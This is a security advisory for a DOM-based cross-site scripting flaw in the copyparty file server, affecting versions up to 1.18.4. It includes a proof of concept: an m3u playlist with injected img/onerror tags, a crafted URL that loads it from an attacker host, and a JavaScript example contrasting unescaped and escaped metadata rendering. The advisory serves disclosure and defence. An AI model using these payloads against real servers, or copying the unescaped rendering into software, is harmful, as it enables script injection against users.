GHSA-9q4r-x2hj-jmvr

Published: 28 Jul 2025
Source: github
GitHub: Reviewed
CVSS3: 5.4

Description

copyparty has DOM-Based XSS vulnerability when displaying multimedia metadata

Summary

An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including m3u files.

Details

Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways:

  • a user who has the necessary permission for uploading files can upload a song with an artist name such as <img src=x onerror=alert(document.domain)>
  • an unauthenticated user can trick another user into clicking a malicious URL, performing this same exploit using an externally hosted m3u file

The CVE score and PoC are based on the m3u approach, which results in a higher severity.

PoC

  1. Create a file named song.m3u with the following content. Host this file on an attacker-controlled web server.

    #EXTM3U
    #EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)>
    http://example.com/audio.mp3

  2. Craft and share the malicious URL:

    http://127.0.0.1:3923/#m3u=https://example.com/song.m3u

Impact

Any user that accesses this malicious URL is impacted.
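The sanitization step the advisory says is missing, as an added example that is not copyparty's own code: it parses the #EXTINF lines of a playlist shaped like the PoC above and contrasts raw interpolation of the artist/title fields with escaping them before they reach the DOM. The parser, the field names and the two render functions are assumptions for illustration.

```javascript
// Added example (not copyparty's own code): parse m3u #EXTINF metadata and
// contrast raw-HTML rendering (the DOM-based XSS above) with escaped rendering.
// Constructed playlist in the same shape as the advisory's PoC.
const SAMPLE_M3U = [
  "#EXTM3U",
  '#EXTINF:1,"><img src=x onerror=alert(document.domain)> - Evil Title',
  "http://example.com/audio.mp3",
  "#EXTINF:200,Normal Artist - Normal Song",
  "http://example.com/other.mp3",
].join("\n");

// "#EXTINF:<duration>,<artist> - <title>" followed by the media URL line.
function parseM3u(text) {
  const entries = [];
  let pending = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line.startsWith("#EXTINF:")) {
      const body = line.slice("#EXTINF:".length);
      const comma = body.indexOf(",");
      const info = comma >= 0 ? body.slice(comma + 1) : body;
      const sep = info.indexOf(" - ");
      pending = {
        artist: sep >= 0 ? info.slice(0, sep) : "",
        title: sep >= 0 ? info.slice(sep + 3) : info,
      };
    } else if (line && !line.startsWith("#") && pending) {
      entries.push({ ...pending, url: line });
      pending = null;
    }
  }
  return entries;
}

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: playlist-controlled metadata interpolated straight into markup for innerHTML.
function renderUnsafe(e) {
  return `<span class="artist">${e.artist}</span> - <span class="title">${e.title}</span>`;
}

// Fixed: every playlist-controlled field is escaped before it reaches the DOM.
function renderSafe(e) {
  return `<span class="artist">${escapeHtml(e.artist)}</span> - <span class="title">${escapeHtml(e.title)}</span>`;
}
```

In a real page, assigning the result of renderSafe to innerHTML (or, better, setting textContent on each span) leaves the payload as visible text rather than an executing element.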

Packages

Name: copyparty (pip)
Affected versions: <= 1.18.4
Fixed version: 1.18.5

EPSS

Percentile: 19%
0.00059
Low

5.4 Medium

CVSS3

Weaknesses

CWE-79

Related vulnerabilities

CVSS3: 5.4
nvd
6 months ago

copyparty is a portable file server. In versions up to and including versions 1.18.4, an unauthenticated attacker is able to execute arbitrary JavaScript code in a victim's browser due to improper sanitization of multimedia tags in music files, including m3u files. This is fixed in version 1.18.5.
